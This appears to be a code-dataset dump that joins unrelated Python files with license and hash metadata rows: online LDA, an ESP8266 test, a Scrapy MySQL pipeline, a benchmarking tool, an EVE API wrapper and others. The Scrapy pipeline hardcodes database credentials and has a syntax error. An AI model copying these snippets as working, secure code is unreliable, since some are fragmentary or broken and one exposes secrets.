wordcts.append(ddict.values())
return((wordids, wordcts))
class OnlineLDA:
"""
Implements online VB for LDA as described in (Hoffman et al. 2010).
"""
def __init__(self, vocab, K, D, alpha, eta, tau0, kappa, init_lambda=None):
"""
Arguments:
K: Number of topics
vocab: A set of words to recognize. When analyzing documents, any word
not in this set will be ignored.
D: Total number of documents in the population. For a fixed corpus,
this is the size of the corpus. In the truly online setting, this
can be an estimate of the maximum number of documents that
could ever be seen.
alpha: Hyperparameter for prior on weight vectors theta
eta: Hyperparameter for prior on topics beta
tau0: A (positive) learning parameter that downweights early iterations
kappa: Learning rate: exponential decay rate---should be between
(0.5, 1.0] to guarantee asymptotic convergence.
Note that if you pass the same set of D documents in every time and
set kappa=0 this class can also be used to do batch VB.
"""
self._vocab = dict()
for word in vocab:
word = word.lower()
word = re.sub(r'[^a-z]', '', word)
self._vocab[word] = len(self._vocab)
self._K = K
self._W = len(self._vocab)
self._D = D
self._alpha = alpha
self._eta = eta
self._tau0 = tau0 + 1
self._kappa = kappa
self._updatect = 0
# Initialize the variational distribution q(beta|lambda)
if init_lambda != None:
self._lambda = init_lambda
else:
self._lambda = 1*n.random.gamma(100., 1./100., (self._K, self._W))
self._Elogbeta = dirichlet_expectation(self._lambda)
self._expElogbeta = n.exp(self._Elogbeta)
def do_e_step(self, docs):
"""
Given a mini-batch of documents, estimates the parameters
gamma controlling the variational distribution over the topic
weights for each document in the mini-batch.
Arguments:
docs: List of D documents. Each document must be represented
as a string. (Word order is unimportant.) Any
words not in the vocabulary will be ignored.
Returns a tuple containing the estimated values of gamma,
as well as sufficient statistics needed to update lambda.
"""
# This is to handle the case where someone just hands us a single
# document, not in a list.
if (type(docs).__name__ == 'string'):
temp = list()
temp.append(docs)
docs = temp
(wordids, wordcts) = parse_doc_list(docs, self._vocab)
batchD = len(docs)
# Initialize the variational distribution q(theta|gamma) for
# the mini-batch
gamma = 1*n.random.gamma(100., 1./100., (batchD, self._K))
Elogtheta = dirichlet_expectation(gamma)
expElogtheta = n.exp(Elogtheta)
sstats = n.zeros(self._lambda.shape)
# Now, for each document d update that document's gamma and phi
it = 0
meanchange = 0
for d in range(0, batchD):
# These are mostly just shorthand (but might help cache locality)
ids = wordids[d]
cts = wordcts[d]
gammad = gamma[d, :]
Elogthetad = Elogtheta[d, :]
expElogthetad = expElogtheta[d, :]
expElogbetad = self._expElogbeta[:, ids]
# The optimal phi_{dwk} is proportional to
# expElogthetad_k * expElogbetad_w. phinorm is the normalizer.
phinorm = n.dot(expElogthetad, expElogbetad) + 1e-100
# Iterate between gamma and phi until convergence
for it in range(0, 100):
lastgamma = gammad
# We represent phi implicitly to save memory and time.
# Substituting the value of the optimal phi back into
# the update for gamma gives this update. Cf. Lee&Seung 2001.
gammad = self._alpha + expElogthetad * \
n.dot(cts / phinorm, expElogbetad.T)
Elogthetad = dirichlet_expectation(gammad)
expElogthetad = n.exp(Elogthetad)
phinorm = n.dot(expElogthetad, expElogbetad) + 1e-100
# If gamma hasn't changed much, we're done.
meanchange = n.mean(abs(gammad - lastgamma))
if (meanchange < meanchangethresh):
break
gamma[d, :] = gammad
# Contribution of document d to the expected sufficient
# statistics for the M step.
sstats[:, ids] += n.outer(expElogthetad.T, cts/phinorm)
# This step finishes computing the sufficient statistics for the
# M step, so that
# sstats[k, w] = \sum_d n_{dw} * phi_{dwk}
# = \sum_d n_{dw} * exp{Elogtheta_{dk} + Elogbeta_{kw}} / phinorm_{dw}.
sstats = sstats * self._expElogbeta
return((gamma, sstats))
def update_lambda(self, docs):
"""
First does an E step on the mini-batch given in wordids and
wordcts, then uses the result of that E step to update the
variational parameter matrix lambda.
Arguments:
docs: List of D documents. Each document must be represented
as a string. (Word order is unimportant.) Any
words not in the vocabulary will be ignored.
Returns gamma, the parameters to the variational distribution
over the topic weights theta for the documents analyzed in this
update.
Also returns an estimate of the variational bound for the
entire corpus for the OLD setting of lambda based on the
documents passed in. This can be used as a (possibly very
noisy) estimate of held-out likelihood.
"""
# rhot will be between 0 and 1, and says how much to weight
# the information we got from this mini-batch.
rhot = pow(self._tau0 + self._updatect, -self._kappa)
self._rhot = rhot
# Do an E step to update gamma, phi | lambda for this
# mini-batch. This also returns the information about phi that
# we need to update lambda.
(gamma, sstats) = self.do_e_step(docs)
# Estimate held-out likelihood for current values of lambda.
bound = self.approx_bound(docs, gamma)
# Update lambda based on documents.
self._lambda = self._lambda * (1-rhot) + \
rhot * (self._eta + self._D * sstats / len(docs))
self._Elogbeta = dirichlet_expectation(self._lambda)
self._expElogbeta = n.exp(self._Elogbeta)
self._updatect += 1
return(gamma, bound)
def approx_bound(self, docs, gamma):
"""
Estimates the variational bound over *all documents* using only
the documents passed in as "docs." gamma is the set of parameters
to the variational distribution q(theta) corresponding to the
set of documents passed in.
The output of this function is going to be noisy, but can be
useful for assessing convergence.
"""
# This is to handle the case where someone just hands us a single
# document, not in a list.
if (type(docs).__name__ == 'string'):
temp = list()
temp.append(docs)
docs = temp
(wordids, wordcts) = parse_doc_list(docs, self._vocab)
batchD = len(docs)
score = 0
Elogtheta = dirichlet_expectation(gamma)
expElogtheta = n.exp(Elogtheta)
# E[log p(docs | theta, beta)]
for d in range(0, batchD):
gammad = gamma[d, :]
ids = wordids[d]
cts = n.array(wordcts[d])
phinorm = n.zeros(len(ids))
for i in range(0, len(ids)):
temp = Elogtheta[d, :] + self._Elogbeta[:, ids[i]]
tmax = max(temp)
phinorm[i] = n.log(sum(n.exp(temp - tmax))) + tmax
score += n.sum(cts * phinorm)
# oldphinorm = phinorm
# phinorm = n.dot(expElogtheta[d, :], self._expElogbeta[:, ids])
# print oldphinorm
# print n.log(phinorm)
# score += n.sum(cts * n.log(phinorm))
# E[log p(theta | alpha) - log q(theta | gamma)]
score += n.sum((self._alpha - gamma)*Elogtheta)
score += n.sum(gammaln(gamma) - gammaln(self._alpha))
score += sum(gammaln(self._alpha*self._K) - gammaln(n.sum(gamma, 1)))
# Compensate for the subsampling of the population of documents
score = score * self._D / len(docs)
# E[log p(beta | eta) - log q (beta | lambda)]
score = score + n.sum((self._eta-self._lambda)*self._Elogbeta)
score = score + n.sum(gammaln(self._lambda) - gammaln(self._eta))
score = score + n.sum(gammaln(self._eta*self._W) -
gammaln(n.sum(self._lambda, 1)))
return(score)
|
apache-2.0
| 4,364,099,052,186,242,600
| 38.481848
| 79
| 0.593413
| false
| 3.807447
| false
| false
| false
|
kfricke/micropython-esp8266uart
|
test_esp8266uart.py
|
1
|
2523
|
import esp8266uart
esp = esp8266uart.ESP8266(1, 115200)
print('Testing generic methods')
print('=======================')
print('AT startup...')
if esp.test():
print('Success!')
else:
print('Failed!')
#print('Soft-Reset...')
#if esp.reset():
# print('Success!')
#else:
# print('Failed!')
print('Another AT startup...')
if esp.test():
print('Success!')
else:
print('Failed!')
print()
print('Testing WIFI methods')
print('====================')
wifi_mode = 1
print("Testing get_mode/set_mode of value '%s'(%i)..." % (esp8266uart.WIFI_MODES[wifi_mode], wifi_mode))
esp.set_mode(wifi_mode)
if esp.get_mode() == wifi_mode:
print('Success!')
else:
print('Failed!')
print('Disconnecting from WLAN...')
if esp.disconnect():
print('Success!')
else:
print('Failed!')
print('Disconnecting from WLAN again...')
if esp.disconnect():
print('Success!')
else:
print('Failed!')
print('Checking if not connected WLAN...')
if esp.get_accesspoint() == None:
print('Success!')
else:
print('Failed!')
print('Scanning for WLANs...')
wlans = esp.list_all_accesspoints()
for wlan in wlans:
print(wlan)
print("Scanning for WLAN '%s'..." % (wlan['ssid']))
for wlan2 in esp.list_accesspoints(wlan['ssid']):
print(wlan2)
print('Setting access point mode...')
if esp.set_mode(esp8266uart.WIFI_MODES['Access Point + Station']):
print('Failed!')
else:
print('Success!')
print('Reading access point configuration')
print(esp.get_accesspoint_config())
print('Listing all stations connected to the module in access point mode...')
print(esp.list_stations())
print('Checking DHCP client and server settings...')
for mode in range(3):
print(esp.set_dhcp_config(mode, 0))
print(esp.set_dhcp_config(mode, 1))
print(esp.set_dhcp_config(mode, True))
print(esp.set_dhcp_config(mode, False))
try:
print(esp.set_dhcp_config(0, 2))
except esp8266uart.CommandError:
print('Obvious error caught!')
try:
print(esp.set_dhcp_config(4, 1))
except esp8266uart.CommandError:
print('Obvious error caught!')
print('Setting autoconnect to access point in station mode...')
esp.set_autoconnect(True)
esp.set_autoconnect(False)
esp.set_autoconnect(True)
print('Reading and setting the station IP...')
print(esp.get_station_ip())
esp.set_station_ip('192.168.1.10')
print(esp.get_station_ip())
print('Reading and setting the access point IP...')
print(esp.get_accesspoint_ip())
esp.set_accesspoint_ip('192.168.1.1')
print(esp.get_accesspoint_ip())
|
mit
| -2,034,658,239,474,637,800
| 23.269231
| 104
| 0.663892
| false
| 3.02518
| true
| false
| false
|
Sudy/ScrapyJD
|
ScrapyJdAzw/pipelines.py
|
1
|
2146
|
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
from scrapy import log
#from scrapy.core.exceptions import DropItem
from twisted.enterprise import adbapi
import time
import MySQLdb.cursors
class ScrapyjdazwPipeline(object):
def __init__(self):
# @@@ hardcoded db settings
# TODO: make settings configurable through settings
self.dbpool = adbapi.ConnectionPool('MySQLdb',
host='192.168.1.153'
db='jddata',
user='spider',
passwd='spider1234',
cursorclass=MySQLdb.cursors.DictCursor,
charset='utf8',
use_unicode=True
)
def process_item(self, item, spider):
# run db query in thread pool
if item.has_key("pinfo"):
result = ""
for it in item["pinfo"]:
result += it.strip()
item["pinfo"] = result
query = self.dbpool.runInteraction(self._conditional_insert, item)
query.addErrback(self.handle_error)
return item
def _conditional_insert(self, tx, item):
# create record if doesn't exist.
# all this block run on it's own thread
if item.has_key("pinfo"):
tx.execute(\
"insert into product_table (pro_id, pro_info, pro_price) "
"values (%s, %s, %s)",
( item['proid'],
item['pinfo'],
item['pricejd'],
)
)
else:
tx.execute(\
"insert into comment_table (pro_id, user, time, score, comment) "
"values (%s, %s, %s, %s, %s)",
( item['proid'],
item['user'],
item['time'],
item['score'],
item['comment'],
)
)
log.msg("Item stored in db: %s" % item["proid"], level=log.INFO)
def handle_error(self, e):
log.err(e)
|
mit
| -3,673,628,681,913,933,000
| 30.573529
| 81
| 0.503728
| false
| 4.207843
| false
| false
| false
|
gsauthof/utility
|
benchmark.py
|
1
|
11990
|
#!/usr/bin/env python3
# 2016, Georg Sauthoff <mail@georg.so>, GPLv3+
import argparse
import collections
import csv
import datetime
import itertools
import logging
# importing it conditionally iff svg generation is selected
# otherwise, it may fail on a system with minimal matplotlib
# install, i.e. where one of the backends loaded by default
# throws
#import matplotlib.pyplot as plt
# importing it conditionally iff csv or not quiet
#import numpy as np
import os
import subprocess
import sys
import tempfile
import time
try:
import colorlog
have_colorlog = True
except ImportError:
have_colorlog = False
def mk_arg_parser():
p = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description='run command multiple times and gather stats',
epilog='''Examples:
Run 3 programs 20 times each and write stats to stdout and the raw
data to a file:
$ benchmark --cmd ./find_memchr ./find_find --raw raw.dat -n 20 \\
./find_unroll2 3000 in
Create boxplot SVG (and nicely format the stdout and also write
the stats to a CSV file):
$ benchmark --input raw.dat --svg rss.svg --csv rss.csv \\
| column -t -s, -o ' | '
In case the benchmarked program needs some options the `--` delimiter
has its usual meaning (also explicitly specifiying a tag):
$ benchmark --tags mode2 -n 1000 -- ./find_unroll2 --mode 2
# 2016, Georg Sauthoff <mail@georg.so>, GPLv3+
'''
)
p.add_argument('argv', nargs='*', help='ARG0.. of the child')
p.add_argument('--cmd', '--cmds', nargs='+', default=[],
help='extra commands to run')
p.add_argument('--cols', nargs='+', default=[1,2,3,4],
help='columns to generate stats for')
p.add_argument('--csv', nargs='?', const='benchmark.csv',
help='also write results as csv')
p.add_argument('--debug', nargs='?', metavar='FILE',
const='benchmark.log', help='log debug messages into file')
p.add_argument('--graph-item', help='item to plot in a graph')
p.add_argument('--height', type=float, help='height of the graph (inch)')
p.add_argument('--input', '-i', metavar='FILE',
help='include raw data from a previous run')
p.add_argument('--items', nargs='+', default=['wall', 'user', 'sys', 'rss'],
help='names for the selected columns')
p.add_argument('--null-out', type=bool, default=True,
help='redirect stdout to /dev/null')
p.add_argument('--pstat', action=InitPstat,
help='set options for `perf stat` instead of GNU time')
p.add_argument('--precision', type=int, default=3,
help='precision for printing values')
p.add_argument('--quiet', '-q', action='store_true', default=False,
help='avoid printing table to stdout')
p.add_argument('--raw', nargs='?', metavar='FILE', const='data.csv',
help='write measurement results to file')
p.add_argument('--repeat', '-n', type=int, default=2,
help='number of times to repeat the measurement')
p.add_argument('--sleep', type=float, default=0.0, metavar='SECONDS',
help='sleep between runs')
p.add_argument('--svg', nargs='?', const='benchmark.svg',
help='write boxplot')
p.add_argument('--tags', nargs='+', default=[],
help='alternative names for the different commands')
p.add_argument('--time', default='/usr/bin/time',
help='measurement program (default: GNU time)')
p.add_argument('--time-args', nargs='+',
default=[ '--append', '--format', '%e,%U,%S,%M', '--output', '$<' ],
help='default arguments to measurement program')
p.add_argument('--timeout', help='timeout for waiting on a child')
p.add_argument('--title', help='title of the graph')
p.add_argument('--width', type=float, help='width of the graph (inch)')
p.add_argument('--xlabel', default='experiment', help='x-axis label')
p.add_argument('--xrotate', type=int,
help='rotate x-labels (default: 75 degrees if more than 4 present')
p.add_argument('--ylabel', default='time (s)', help='y-axis label')
p.add_argument('--ymax', type=float,
help='set upper y-axis limit')
p.add_argument('--ymin', type=float, default=0.0,
help='set lower y-axis limit')
return p
class InitPstat(argparse.Action):
def __init__(self, option_strings, dest, **kwargs):
super(InitPstat, self).__init__(
option_strings, dest, nargs=0, **kwargs)
def __call__(self, parser, args, values, option_string=None):
args.time = 'perfstat.sh'
args.time_args = [ '-o', '$<' ]
args.cols = list(range(1,12))
args.items = [ 'nsec','cswitch','cpu_migr','page_fault','cycles','ghz','ins','ins_cyc','br','br_mis','br_mis_rate' ]
if not args.graph_item:
args.graph_item = 'ins_cyc'
args.title = 'Counter ({})'.format(args.graph_item)
args.ylabel = 'rate'
def parse_args(xs = None):
arg_parser = mk_arg_parser()
if xs or xs == []:
args = arg_parser.parse_args(xs)
else:
args = arg_parser.parse_args()
if not args.argv and not args.input:
raise ValueError('Neither cmd+args nor --input option present')
if args.debug:
setup_file_logging(args.debug)
if args.argv:
args.cmd = [ args.argv[0] ] + args.cmd
args.argv = args.argv[1:]
args.cols = [ int(x) for x in args.cols ]
if args.tags and args.tag.__len__() != args.cmd.__len__():
raise ValueError('not enough tags specified')
if not args.tags:
args.tags = [ os.path.basename(x) for x in args.cmd ]
if not args.graph_item:
args.graph_item = args.items[0]
if not args.title:
args.title = 'Runtime ({})'.format(args.graph_item)
if args.svg:
#import matplotlib.pyplot as plt
global matplotlib
global plt
matplotlib = __import__('matplotlib.pyplot', globals(), locals())
plt = matplotlib.pyplot
if args.csv or not args.quiet or args.svg:
global np
numpy = __import__('numpy', globals(), locals())
np = numpy
#import numpy as np
return args
log_format = '%(asctime)s - %(levelname)-8s - %(message)s'
log_date_format = '%Y-%m-%d %H:%M:%S'
def mk_formatter():
f = logging.Formatter(log_format, log_date_format)
return f
def mk_logger():
log = logging.getLogger() # root logger
log.setLevel(logging.DEBUG)
#log.setLevel(logging.INFO)
if have_colorlog:
cformat = '%(log_color)s' + log_format
cf = colorlog.ColoredFormatter(cformat, log_date_format,
log_colors = { 'DEBUG': 'reset', 'INFO': 'reset',
'WARNING' : 'bold_yellow' , 'ERROR': 'bold_red',
'CRITICAL': 'bold_red'})
else:
cf = logging.Formatter(log_format, log_date_format)
ch = logging.StreamHandler()
ch.setLevel(logging.WARNING)
if os.isatty(2):
ch.setFormatter(cf)
else:
ch.setFormatter(f)
log.addHandler(ch)
return logging.getLogger(__name__)
log = mk_logger()
def setup_file_logging(filename):
log = logging.getLogger()
fh = logging.FileHandler(filename)
fh.setLevel(logging.DEBUG)
f = logging.Formatter(log_format + ' - [%(name)s]', log_date_format)
fh.setFormatter(f)
log.addHandler(fh)
# Reasons for using an external `time` command instead of
# calling e.g. `getrusage()`:
# - the forked child will start
# with the RSS of the python parent - thus, it will be reported
# too high if child actually uses less memory
# - same code path as for other measurement tools
# - elapsed time would have to be measured separately, otherwise
def measure(tag, cmd, args):
errors = 0
if args.null_out:
stdout = subprocess.DEVNULL
else:
stdout = None
with tempfile.NamedTemporaryFile(mode='w+', newline='') as temp_file:
time_args = args.time_args.copy()
time_args[time_args.index('$<')] = temp_file.name
a = [ args.time ] + time_args + [cmd] + args.argv
rc = -1
with subprocess.Popen(a, stdout=stdout) as p:
rc = p.wait(timeout=args.timeout)
if rc != 0:
log.error('Command {} failed with rc: {}'.format(cmd, rc))
errors = errors + 1
reader = csv.reader(temp_file)
r = [tag] + next(reader)
r.append(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'))
r.append(rc)
r.append(cmd)
r.append(str(args.argv))
return (r, errors)
def execute(args):
xs = []
esum = 0
for (tag, cmd) in zip(args.tags, args.cmd):
rs = []
for i in range(args.repeat):
try:
m, errors = measure(tag, cmd, args)
if args.sleep > 0:
time.sleep(args.sleep)
rs.append(m)
esum = esum + errors
except StopIteration:
esum = esum + 1
log.error("Couldn't read measurements from teporary file"
+ '- {} - {}'.format(tag, i))
xs.append( (tag, rs) )
return (xs, esum)
def read_raw(filename):
with open(filename, 'r', newline='') as f:
reader = csv.reader(f)
rs = []
next(reader)
xs = [ (k, list(l))
for (k, l) in itertools.groupby(reader, lambda row: row[0])]
# is equivalent to:
# prev = None
# xs = []
# l = []
# for row in reader:
# if prev != row[0]:
# l = []
# xs.append( (row[0], l) )
# l.append(row)
# prev = row[0]
return xs
def write_raw(rrs, args, filename):
with open(filename, 'a', newline='') as f:
writer = csv.writer(f)
writer.writerow(['tag'] + args.items + ['date', 'rc', 'cmd', 'args' ])
for rs in rrs:
for row in rs[1]:
writer.writerow(row)
def write_svg(ys, args, filename):
tags, items_l = zip(*ys)
xrotate = args.xrotate
if not xrotate and tags.__len__() > 4:
xrotate = 75
if args.width and args.height:
plt.figure(figsize=(args.width, args.height))
r = plt.boxplot( [ items[args.graph_item] for items in items_l ],
labels=tags )
ymax = args.ymax
if not args.ymax:
m = np.amax([np.amax(items[args.graph_item]) for items in items_l ])
ymax = np.ceil(m + (m - args.ymin) / 10)
plt.ylim(ymin=args.ymin, ymax=ymax)
plt.title(args.title)
if xrotate:
plt.xticks(rotation=xrotate) # 70 # 90
plt.xlabel(args.xlabel)
plt.ylabel(args.ylabel)
plt.tight_layout()
plt.savefig(filename)
# normally, we would just use a csv.writer() but
# we want to control the number of significant figures
def write_csv(zs, args, f):
if not zs:
return
header = ['tag'] + list(zs[0][1]._fields)
fstr = '{:1.'+str(args.precision)+'f}'
print(','.join(header), file=f)
for (tag, stat) in zs:
row = [tag] + list(stat)
srow = []
for r in row:
if type(r) is float or type(r) is np.float64:
srow.append(fstr.format(r))
else:
srow.append(str(r))
print(','.join(srow), file=f)
def get_items(rs, args):
m = np.zeros(rs.__len__(), dtype=[(x, 'float64') for x in args.items ] )
i = 0
for row in rs:
j = 0
for c in args.cols:
v = row[c]
m[i][j] = 0 if v == '' else v
j = j + 1
i = i + 1
return m
Stat = collections.namedtuple('Stat',
['n', 'min', 'Q1', 'median', 'Q3', 'max', 'mean', 'dev', 'item' ])
def gen_stats(items, args):
#for name in items.dtype.names:
name = args.graph_item
c = items[name]
ps = np.percentile(c, [25, 50, 75] )
# there is also np.median()
s = Stat(n=c.__len__(), min=np.amin(c), Q1=ps[0], median=ps[1],
Q3=ps[2], max=np.amax(c),
mean=np.mean(c), dev=np.std(c), item=name)
return s
def run(args):
xs = []
errors = 0
if args.input:
xs = xs + read_raw(args.input)
if args.cmd:
rxs, errors = execute(args)
xs = xs + rxs
if args.csv or not args.quiet or args.svg:
ys = [ (tag, get_items(rs, args)) for (tag, rs) in xs ]
if args.csv or not args.quiet:
zs = [ (tag, gen_stats(items, args)) for (tag, items) in ys ]
if args.csv:
with open(args.csv, 'w') as f:
write_csv(zs, args, f)
if not args.quiet:
write_csv(zs, args, sys.stdout)
if args.raw:
write_raw(xs, args, args.raw)
if args.svg:
write_svg(ys, args, args.svg)
return int(errors != 0)
def main():
args = parse_args()
return run(args)
if __name__ == '__main__':
sys.exit(main())
|
gpl-3.0
| 8,276,299,148,018,042,000
| 30.973333
| 120
| 0.621101
| false
| 3.215339
| false
| false
| false
|
EricE/evelink
|
evelink/api.py
|
1
|
9272
|
from cStringIO import StringIO
import calendar
import functools
import logging
import re
import time
from urllib import urlencode
import urllib2
from xml.etree import ElementTree
_log = logging.getLogger('evelink.api')
try:
import requests
_has_requests = True
except ImportError:
_log.info('`requests` not available, falling back to urllib2')
_has_requests = None
def _clean(v):
"""Convert parameters into an acceptable format for the API."""
if isinstance(v, (list, set, tuple)):
return ",".join(str(i) for i in v)
else:
return str(v)
def parse_ts(v):
"""Parse a timestamp from EVE API XML into a unix-ish timestamp."""
if v == '':
return None
ts = calendar.timegm(time.strptime(v, "%Y-%m-%d %H:%M:%S"))
# Deal with EVE's nonexistent 0001-01-01 00:00:00 timestamp
return ts if ts > 0 else None
def get_named_value(elem, field):
"""Returns the string value of the named child element."""
try:
return elem.find(field).text
except AttributeError:
return None
def get_ts_value(elem, field):
"""Returns the timestamp value of the named child element."""
val = get_named_value(elem, field)
if val:
return parse_ts(val)
return None
def get_int_value(elem, field):
"""Returns the integer value of the named child element."""
val = get_named_value(elem, field)
if val:
return int(val)
return val
def get_float_value(elem, field):
"""Returns the float value of the named child element."""
val = get_named_value(elem, field)
if val:
return float(val)
return val
def get_bool_value(elem, field):
"""Returns the boolean value of the named child element."""
val = get_named_value(elem, field)
if val == 'True':
return True
elif val == 'False':
return False
return None
def elem_getters(elem):
"""Returns a tuple of (_str, _int, _float, _bool, _ts) functions.
These are getters closed around the provided element.
"""
_str = lambda key: get_named_value(elem, key)
_int = lambda key: get_int_value(elem, key)
_float = lambda key: get_float_value(elem, key)
_bool = lambda key: get_bool_value(elem, key)
_ts = lambda key: get_ts_value(elem, key)
return _str, _int, _float, _bool, _ts
def parse_keyval_data(data_string):
"""Parse 'key: value' lines from a LF-delimited string."""
keyval_pairs = data_string.strip().split('\n')
results = {}
for pair in keyval_pairs:
key, _, val = pair.strip().partition(': ')
if 'Date' in key:
val = parse_ms_date(val)
elif val == 'null':
val = None
elif re.match(r"^-?\d+$", val):
val = int(val)
elif re.match(r"-?\d+\.\d+", val):
val = float(val)
results[key] = val
return results
def parse_ms_date(date_string):
"""Convert MS date format into epoch"""
return int(date_string)/10000000 - 11644473600;
class APIError(Exception):
"""Exception raised when the EVE API returns an error."""
def __init__(self, code=None, message=None):
self.code = code
self.message = message
def __repr__(self):
return "APIError(%r, %r)" % (self.code, self.message)
def __str__(self):
return "%s (code=%d)" % (self.message, int(self.code))
class APICache(object):
"""Minimal interface for caching API requests.
This very basic implementation simply stores values in
memory, with no other persistence. You can subclass it
to define a more complex/featureful/persistent cache.
"""
def __init__(self):
self.cache = {}
def get(self, key):
"""Return the value referred to by 'key' if it is cached.
key:
a result from the Python hash() function.
"""
result = self.cache.get(key)
if not result:
return None
value, expiration = result
if expiration < time.time():
del self.cache[key]
return None
return value
def put(self, key, value, duration):
"""Cache the provided value, referenced by 'key', for the given duration.
key:
a result from the Python hash() function.
value:
an xml.etree.ElementTree.Element object
duration:
a number of seconds before this cache entry should expire.
"""
expiration = time.time() + duration
self.cache[key] = (value, expiration)
class API(object):
"""A wrapper around the EVE API."""
def __init__(self, base_url="api.eveonline.com", cache=None, api_key=None):
self.base_url = base_url
cache = cache or APICache()
if not isinstance(cache, APICache):
raise ValueError("The provided cache must subclass from APICache.")
self.cache = cache
self.CACHE_VERSION = '1'
if api_key and len(api_key) != 2:
raise ValueError("The provided API key must be a tuple of (keyID, vCode).")
self.api_key = api_key
self._set_last_timestamps()
def _set_last_timestamps(self, current_time=0, cached_until=0):
self.last_timestamps = {
'current_time': current_time,
'cached_until': cached_until,
}
def _cache_key(self, path, params):
sorted_params = sorted(params.iteritems())
# Paradoxically, Shelve doesn't like integer keys.
return '%s-%s' % (self.CACHE_VERSION, hash((path, tuple(sorted_params))))
def get(self, path, params=None):
"""Request a specific path from the EVE API.
The supplied path should be a slash-separated path
frament, e.g. "corp/AssetList". (Basically, the portion
of the API url in between the root / and the .xml bit.)
"""
params = params or {}
params = dict((k, _clean(v)) for k,v in params.iteritems())
_log.debug("Calling %s with params=%r", path, params)
if self.api_key:
_log.debug("keyID and vCode added")
params['keyID'] = self.api_key[0]
params['vCode'] = self.api_key[1]
key = self._cache_key(path, params)
response = self.cache.get(key)
cached = response is not None
if not cached:
# no cached response body found, call the API for one.
params = urlencode(params)
full_path = "https://%s/%s.xml.aspx" % (self.base_url, path)
response = self.send_request(full_path, params)
else:
_log.debug("Cache hit, returning cached payload")
tree = ElementTree.parse(StringIO(response))
current_time = get_ts_value(tree, 'currentTime')
expires_time = get_ts_value(tree, 'cachedUntil')
self._set_last_timestamps(current_time, expires_time)
if not cached:
# Have to split this up from above as timestamps have to be
# extracted.
self.cache.put(key, response, expires_time - current_time)
error = tree.find('error')
if error is not None:
code = error.attrib['code']
message = error.text.strip()
exc = APIError(code, message)
_log.error("Raising API error: %r" % exc)
raise exc
result = tree.find('result')
return result
def send_request(self, full_path, params):
if _has_requests:
return self.requests_request(full_path, params)
else:
return self.urllib2_request(full_path, params)
def urllib2_request(self, full_path, params):
try:
if params:
# POST request
_log.debug("POSTing request")
r = urllib2.urlopen(full_path, params)
else:
# GET request
_log.debug("GETting request")
r = urllib2.urlopen(full_path)
result = r.read()
r.close()
return result
except urllib2.URLError as e:
# TODO: Handle this better?
raise e
def requests_request(self, full_path, params):
session = getattr(self, 'session', None)
if not session:
session = requests.Session()
self.session = session
try:
if params:
# POST request
_log.debug("POSTing request")
r = session.post(full_path, params=params)
else:
# GET request
_log.debug("GETting request")
r = session.get(full_path)
return r.content
except requests.exceptions.RequestException as e:
# TODO: Handle this better?
raise e
def auto_api(func):
"""A decorator to automatically provide an API instance.
Functions decorated with this will have the api= kwarg
automatically supplied with a default-initialized API()
object if no other API object is supplied.
"""
@functools.wraps(func)
def wrapper(*args, **kwargs):
if 'api' not in kwargs:
kwargs['api'] = API()
return func(*args, **kwargs)
return wrapper
# vim: set ts=4 sts=4 sw=4 et:
|
mit
| 5,219,783,712,813,521,000
| 29.201954
| 87
| 0.584232
| false
| 3.948893
| false
| false
| false
|
KonradBreitsprecher/espresso
|
samples/ekboundaries.py
|
1
|
1441
|
from espressomd import System, shapes, electrokinetics
import sys
system = System(box_l = [10, 10, 10])
system.set_random_state_PRNG()
#system.seed = system.cell_system.get_state()['n_nodes'] * [1234]
system.cell_system.skin = 0.4
system.time_step = 0.1
ek = electrokinetics.Electrokinetics(
lb_density=1, friction=1, agrid=1, viscosity=1, T=1, prefactor=1)
pos = electrokinetics.Species(
density=0.05, D=0.1, valency=1, ext_force=[0, 0, 1.])
neg = electrokinetics.Species(
density=0.05, D=0.1, valency=-1, ext_force=[0, 0, -1.])
ek.add_species(pos)
ek.add_species(neg)
system.actors.add(ek)
print(ek.get_params())
print(pos.get_params())
print(neg.get_params())
print(pos[5, 5, 5].density)
ek_wall_left = electrokinetics.EKBoundary(
shape=shapes.Wall(dist=1, normal=[1, 0, 0]), charge_density=-0.01)
ek_wall_right = electrokinetics.EKBoundary(
shape=shapes.Wall(dist=-9, normal=[-1, 0, 0]), charge_density=0.01)
system.ekboundaries.add(ek_wall_left)
system.ekboundaries.add(ek_wall_right)
for i in range(1000):
system.integrator.run(100)
sys.stdout.write("\rIntegrating: %03i" % i)
sys.stdout.flush()
pos.print_vtk_density("ek/pos_dens_%i.vtk" % i)
neg.print_vtk_density("ek/neg_dens_%i.vtk" % i)
pos.print_vtk_flux("ek/pos_flux_%i.vtk" % i)
neg.print_vtk_flux("ek/neg_flux_%i.vtk" % i)
ek.print_vtk_velocity("ek/ekv_%i.vtk" % i)
ek.print_vtk_boundary("ek/ekb_%i.vtk" % i)
|
gpl-3.0
| -5,257,314,025,805,871,000
| 29.659574
| 71
| 0.676613
| false
| 2.467466
| false
| false
| false
|
btwn2thvs/skype-me
|
skype-search/skype-dao.py
|
1
|
1424
|
import sqlite3
import logging
DATABASE = '/Users/wcampbell/Library/Application Support/Skype/willcampbell_ha/main.db'
unique_participants_sql = 'SELECT DISTINCT(participants) FROM Chats'
messages_by_author_sql = 'SELECT from_dispname, body_xml FROM Messages where dialog_partner = ?'
def most_common(t):
word_counter = {}
for word in t:
if word and word != "willcampbell_ha":
if word in word_counter:
word_counter[word] += 1
else:
word_counter[word] = 1
popular_words = sorted(word_counter, key = word_counter.get, reverse = True)
return popular_words
class BaseDao(object):
def __init__(self, db):
logging.info('Opening a sqlite db connection')
self.conn = sqlite3.connect(db)
self.c = self.conn.cursor()
def get_all_messages(self, *authors):
'''
Return a list of messages by authors
'''
self.c.execute(messages_by_author_sql, authors)
return self.c.fetchall()
def get_unique_participants(self):
self.c.execute(unique_participants_sql)
return self.c.fetchall()
b = BaseDao(DATABASE)
#print b.get_all_messages("stacy.vanderworth")
p = []
for participants in b.get_unique_participants():
participant_list = participants[0]
if participant_list:
p += participant_list.split()
print most_common(p)[:3]
|
mit
| -6,106,299,922,487,574,000
| 29.319149
| 96
| 0.632725
| false
| 3.614213
| false
| false
| false
|
vgrem/Office365-REST-Python-Client
|
tests/sharepoint/test_publishing.py
|
1
|
1894
|
from office365.sharepoint.publishing.primary_city_time import PrimaryCityTime
from office365.sharepoint.publishing.site_page_metadata_collection import SitePageMetadataCollection
from office365.sharepoint.publishing.site_page_service import SitePageService
